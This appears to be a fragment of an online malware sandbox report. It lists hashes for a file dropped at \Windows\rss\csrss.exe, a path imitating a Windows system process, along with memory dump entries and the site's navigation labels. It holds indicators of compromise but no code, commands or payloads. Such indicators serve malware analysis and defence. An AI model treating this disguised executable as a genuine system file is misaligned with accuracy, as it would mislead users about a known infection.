aa6d45515e85826488438d5257ccadc54bc2adad51c28b34a74bf6f82e7957e0

SHA512
76c0abde2882f01801bdd4dd6bec17919e688f587ec28cd75bf1ba92735d5b3ba96194f0239973a427866b1bf745abc8253335f31b1369ebbfc3c84156289cb9

Download Submit
\Windows\rss\csrss.exe
Filesize
3.8MB

MD5
75b7ef1e1078db669732ed9c778539d1

SHA1
62b185a7bc12c6e92085ab5acd8dd98f7b829970

SHA256
aa6d45515e85826488438d5257ccadc54bc2adad51c28b34a74bf6f82e7957e0

SHA512
76c0abde2882f01801bdd4dd6bec17919e688f587ec28cd75bf1ba92735d5b3ba96194f0239973a427866b1bf745abc8253335f31b1369ebbfc3c84156289cb9

Download Submit
memory/960-55-0x0000000002670000-0x0000000002A17000-memory.dmp

Filesize
3.7MB

Download
memory/960-56-0x0000000002A20000-0x0000000003116000-memory.dmp

Filesize
7.0MB

Download
memory/960-57-0x0000000000400000-0x0000000000D2B000-memory.dmp

Filesize
9.2MB

Download
memory/960-54-0x0000000002670000-0x0000000002A17000-memory.dmp

Filesize
3.7MB

Download
memory/1228-58-0x0000000002710000-0x0000000002AB7000-memory.dmp

Filesize
3.7MB

Download
memory/1228-62-0x0000000002710000-0x0000000002AB7000-memory.dmp

Filesize
3.7MB

Download
memory/1228-67-0x0000000000400000-0x0000000000D2B000-memory.dmp

Filesize
9.2MB

Download
memory/1372-65-0x0000000000000000-mapping.dmp

Download
memory/1372-68-0x00000000027A0000-0x0000000002B47000-memory.dmp

Filesize
3.7MB

Download
memory/1372-69-0x00000000027A0000-0x0000000002B47000-memory.dmp

Filesize
3.7MB

Download
memory/1372-70-0x0000000000400000-0x0000000000D2B000-memory.dmp

Filesize
9.2MB

Download
memory/1472-61-0x000007FEFC041000-0x000007FEFC043000-memory.dmp

Filesize
8KB

Download
memory/1472-60-0x0000000000000000-mapping.dmp

Download
memory/1672-59-0x0000000000000000-mapping.dmp

Download

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Matrix ATT&CK v6

Replay Monitor

Loading Replay Monitor...

Downloads